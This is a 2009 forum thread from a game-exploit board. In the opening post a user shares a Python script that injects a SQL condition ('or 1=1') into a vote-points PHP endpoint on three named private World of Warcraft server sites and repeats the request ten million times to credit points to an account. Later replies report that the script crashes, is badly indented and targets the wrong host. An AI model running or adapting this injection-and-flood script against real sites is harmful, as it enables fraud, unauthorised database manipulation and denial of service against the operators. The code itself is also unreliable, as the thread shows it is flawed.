Etternion vote exloit YES IT WOKRS menu

Shout-Out

User Tag List

Page 1 of 2 12 LastLast
Results 1 to 15 of 24
  1. #1
    gatk0o's Avatar Member
    Reputation
    6
    Join Date
    Mar 2009
    Posts
    25
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Etternion vote exloit YES IT WOKRS

    Ok so listen up copy this to a txt file then rename it to .py you need a program called Python .Instal the program , run the script and Enjoy

    from socket import *
    from time import sleep

    port = 80
    #new way faster voting
    request_pt1 = "/getpoint.php?url=leet'+or+1='1+--&char=" #b sql inj condition = true
    request_pt2 = '&sn=1234809692227'

    print('[-]getpoint.php Vote Points Exploit By DarkInjection')
    print('[-]Usage Its Simple Just Give The Name To Add Some Points And Thats It')
    print('[-]Current Exploitable Realms :')
    print('\t*-->eternion-wow id[1]')
    print('\t*-->WoW-Wal id[2]')
    print('\t*-->wowolympc.com id[3]')
    name = raw_input('[*]Enter The Name To Vote Exploit: ')
    realm = raw_input('[*]Enter The Realm Id To Vote Exploit: ')
    if(len(name) > 0):
    print('[-]Name : '+name)
    else:
    print('gttk')
    exit(1)
    if(int(realm) == int(1)):
    target = 'www.antwow.com'
    if(int(realm) == int(2)):
    target = 'www.wowwal.com'
    if(int(realm) == int(3)):
    target = 'www.wowolympc.com'
    #basic browser request
    server_request ='GET '
    server_request +=request_pt1
    server_request +=name
    server_request +=request_pt2
    server_request +=' HTTP/1.1\r\n'
    server_request +='Host: '+target+'\r\n'
    server_request +='User-Agent: Mozilla/5.0\r\n'
    server_request +='Keep-Alive: 300\r\n'
    server_request +='Connection: Keep-Alive\r\n\r\n'
    #server_request +='Cookie: PHPSESSID=b98fd4a3e307a1f63c71d02cb5dfbfe3; TIMEA=1234809690; TYPEA=94.71.240.1901\r\n\r\n' we dont need the cookie
    #since **** up everything
    count = 10000000#times to send votes to take:P
    print('[*]Requesting The Server !')
    for i in range(0,int(count)):
    try:
    i = socket(AF_INET,SOCK_STREAM)
    except:
    print('[/]Error In SOcket Function')
    try:
    i.connect((target,int(port)))
    except:
    print('[/]Error In Connect()')
    try:
    i.send(server_request)
    print('[*]Request.....')
    print(i.recv(10000))
    except:
    print('[/]Error In Send()')

    Etternion vote exloit YES IT WOKRS
  2. #2
    Mirror's Avatar Contributor
    Reputation
    259
    Join Date
    Nov 2006
    Posts
    2,602
    Thanks G/R
    0/0
    Trade Feedback
    2 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    THIS SIGNATURE IS IN VIALOATION OF SITE RULES, PLEASE FIX ME!
    -Fault

  3. #3
    Brutakus's Avatar Brutakus
    Reputation
    346
    Join Date
    Aug 2007
    Posts
    891
    Thanks G/R
    10/4
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Repost. Reported for deletion

  4. #4
    Ragezors's Avatar Member
    Reputation
    14
    Join Date
    Dec 2008
    Posts
    112
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    ehhh... No +rep, try to find the bugs that aren't repost!

  5. #5
    gatk0o's Avatar Member
    Reputation
    6
    Join Date
    Mar 2009
    Posts
    25
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    a

    no this is a WORKING method thats an old one >.>

  6. #6
    Ragezors's Avatar Member
    Reputation
    14
    Join Date
    Dec 2008
    Posts
    112
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    What does it changes, is it faster?
    If so, how many vote points each hour or minute=

  7. #7
    gatk0o's Avatar Member
    Reputation
    6
    Join Date
    Mar 2009
    Posts
    25
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    a

    humm... i think 3k in 10 minutes

  8. #8
    Holypaja's Avatar Banned
    Reputation
    12
    Join Date
    May 2007
    Posts
    130
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    When i start it, it just shutdown . . what to do ?

  9. #9
    AngshumanSSJV's Avatar Member
    Reputation
    65
    Join Date
    May 2008
    Posts
    519
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    WTF Reposts lol..

    Everyone, stop posting EternionWoW/WoWAXA/AntWoW exploits/hacks.. cause the fking site n00bs i.e. Fuzzymini is here.

  10. #10
    gatk0o's Avatar Member
    Reputation
    6
    Join Date
    Mar 2009
    Posts
    25
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    a

    1st acc name then type 1 for eternion

  11. #11
    abadmofo's Avatar Member
    Reputation
    1
    Join Date
    Mar 2009
    Posts
    21
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    lol it crashes poython when you try to start it...re-check the code?

  12. #12
    gatk0o's Avatar Member
    Reputation
    6
    Join Date
    Mar 2009
    Posts
    25
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    if it crashes maybe ur using an older version of Python or misstyped the script if u have a Skype name find me : gatk0o

  13. #13
    abadmofo's Avatar Member
    Reputation
    1
    Join Date
    Mar 2009
    Posts
    21
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by gatk0o View Post
    1st acc name then type 1 for eternion
    My python is up to date so it must be you're script. Since you said you got 3k in 10min just edit you're post with the script use or upload it. That way instead of helping just me you can help everyone.

  14. #14
    blackarmfan's Avatar Member
    Reputation
    1
    Join Date
    Feb 2008
    Posts
    20
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Ok, there's a few annoying things here, please make upload the script to the internet as I was getting errors before I had fixed indents on every single line...

    After I type in my name this happens: it just shuts down. same when I run it with console and not IDLE. There's something wrong with your script TBH... or atleast upload the script that you say is working


    [-]getpoint.php Vote Points Exploit By DarkInjection
    [-]Usage Its Simple Just Give The Name To Add Some Points And Thats It
    [-]Current Exploitable Realms :
    *-->eternion-wow id[1]
    *-->WoW-Wal id[2]
    *-->wowolympc.com id[3][*]Enter The Name To Vote Exploit: ****[*]Enter The Realm Id To Vote Exploit: 1
    [-]Name : ****


    And whats up with this 1 line? a server request with # infront of it...

    EDIT 1:

    #server_request +='Cookie: PHPSESSID=b98fd4a3e307a1f63c71d02cb5dfbfe3; TIMEA=1234809690; TYPEA=94.71.240.1901\r\n\r\n' we dont need the cookie

    Dont you mean:
    server_request +='Cookie: PHPSESSID=b98fd4a3e307a1f63c71d02cb5dfbfe3; TIMEA=1234809690; TYPEA=94.71.240.1901\r\n\r\n' #we dont need the cookie?


    EDIT 2:

    Omg, I just went through a second time and the script doesnt even have a connection to etternion wow, when you click 1 you make a link with antwow... Seriously, I would just ignore this script til Gatk0o has uploaded it to some random site and someone can confirm it working....
    Last edited by blackarmfan; 04-09-2009 at 04:22 AM. Reason: even more info

  15. #15
    gatk0o's Avatar Member
    Reputation
    6
    Join Date
    Mar 2009
    Posts
    25
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    ok i upload it on rapidshare
    RapidShare: Easy Filehosting
    hope i helped u

Page 1 of 2 12 LastLast

Similar Threads

  1. New vote xploit for Etternion
    By karapidiola in forum WoW EMU Exploits & Bugs
    Replies: 103
    Last Post: 05-22-2009, 10:38 PM
  2. yes ive asked this before but....
    By keniel in forum WoW ME Questions and Requests
    Replies: 3
    Last Post: 10-11-2006, 01:56 AM
  3. Mountion Cribel for 1.11.2, and yes we all deserv it!
    By Hounro in forum World of Warcraft Exploits
    Replies: 10
    Last Post: 08-08-2006, 04:15 PM
  4. voteing switch
    By Tenche in forum Suggestions
    Replies: 1
    Last Post: 07-05-2006, 09:01 AM
  5. Decide which Banner we use voting thread
    By Matt in forum Community Chat
    Replies: 43
    Last Post: 06-30-2006, 06:22 AM
All times are GMT -5. The time now is 06:53 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search